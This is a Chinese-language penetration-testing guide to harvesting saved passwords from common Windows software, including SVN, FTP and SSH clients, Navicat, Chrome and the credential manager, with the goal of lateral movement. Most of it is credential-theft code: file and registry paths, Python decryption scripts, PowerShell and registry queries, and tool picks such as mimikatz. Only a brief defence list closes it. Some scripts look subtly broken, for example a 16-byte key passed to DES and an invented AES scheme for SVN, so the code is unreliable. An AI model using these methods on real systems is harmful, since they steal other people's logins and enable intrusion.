内网常见软件密码收集
字数 973 2025-08-09 13:33:40
内网常见软件密码收集技术指南
1. TortoiseSVN密码收集
1.1 密码存储位置
TortoiseSVN客户端连接记录文件位于:
%APPDATA%\Subversion\auth\svn.simple\
1.2 密码提取方法
- 定位到上述目录,找到包含认证信息的文件
- 使用以下Python脚本解密密码:
import base64
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
def decrypt_password(encrypted_password):
key = SHA256.new(b'!1@2#3$4%5^6').digest()
iv = b'\x00' * 16
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(base64.b64decode(encrypted_password))
return decrypted.decode('utf-8').rstrip('\x00')
- 或者使用以下PowerShell命令直接读取:
Get-ChildItem "$env:APPDATA\Subversion\auth\svn.simple\" | ForEach-Object {
$file = $_.FullName
Get-Content $file | Where-Object { $_ -match 'password' } | ForEach-Object {
$_.Split('=')[1].Trim()
}
}
2. FileZilla密码收集
2.1 密码存储位置
FileZilla配置文件位于:
%APPDATA%\FileZilla\recentservers.xml
%APPDATA%\FileZilla\sitemanager.xml
2.2 密码提取方法
- 直接查看XML文件中的密码字段(Base64编码)
- 使用以下Python脚本解码:
import base64
def decode_filezilla_password(encoded):
return base64.b64decode(encoded).decode('utf-8')
- 或者使用以下PowerShell命令:
Select-String -Path "$env:APPDATA\FileZilla\*.xml" -Pattern "Pass encoding=" -Context 0,3
3. Xshell密码收集
3.1 密码存储位置
Xshell会话文件位于:
%USERPROFILE%\Documents\NetSarang Computer\Xshell\Sessions\
3.2 密码提取方法
- 使用SharpDecryptPwd工具解密:
SharpDecryptPwd.exe -X
- 或者手动分析.ini文件中的加密字段
4. Navicat密码收集
4.1 密码存储位置
Navicat配置文件位于:
%APPDATA%\PremiumSoft\Navicat\Servers\
4.2 密码提取方法
- 使用以下Python脚本解密:
import binascii
from Crypto.Cipher import DES
def decrypt_navicat_password(encrypted):
key = b'libcckeylibcckey'
cipher = DES.new(key, DES.MODE_ECB)
decrypted = cipher.decrypt(binascii.unhexlify(encrypted))
return decrypted.decode('utf-8').rstrip('\x00')
5. SecureCRT密码收集
5.1 密码存储位置
SecureCRT配置文件位于:
%APPDATA%\VanDyke\Config\Sessions\
5.2 密码提取方法
- 使用以下Python脚本解密:
from Crypto.Cipher import Blowfish
def decrypt_securecrt_password(encrypted):
key = b'\x24\xA6\x3D\xDE\x5B\xD3\xB3\x82\x9C\x7E\x06\xF4\x08\x16\xAA\x07'
cipher = Blowfish.new(key, Blowfish.MODE_CBC, b"\x00"*8)
return cipher.decrypt(encrypted).decode('utf-8').rstrip('\x00')
6. 浏览器保存的密码
6.1 Chrome密码提取
- 使用以下PowerShell命令:
$data = Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Encoding Byte
# 使用SQLite解析数据库
- 或者使用以下Python脚本:
import sqlite3
import win32crypt
conn = sqlite3.connect('Login Data')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
print(f"URL: {result[0]}, Username: {result[1]}, Password: {password.decode('utf-8')}")
7. Windows凭据管理器
7.1 提取方法
- 使用PowerShell命令:
cmdkey /list
- 使用VaultCmd工具:
VaultCmd /listcreds:"Windows Credentials" /all
8. 其他常见应用密码
8.1 WinSCP密码
存储位置:
HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
8.2 Outlook密码
使用MailPassView工具提取
8.3 RDP连接密码
使用以下命令提取:
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
9. 自动化工具推荐
- LaZagne - 全能密码提取工具
- mimikatz - Windows凭据提取神器
- SharpDecryptPwd - 专用于各种客户端密码解密
- BrowserGhost - 浏览器密码提取工具
10. 防御建议
- 禁用客户端软件的密码保存功能
- 使用企业级密码管理解决方案
- 定期审计服务器上的敏感信息
- 实施最小权限原则
- 对敏感配置文件设置严格的访问权限
总结
本文详细介绍了内网渗透中常见软件的密码收集技术,包括文件位置、解密方法和实用脚本。掌握这些技术有助于安全测试人员进行内网横向移动,同时也提醒管理员加强相关防护措施。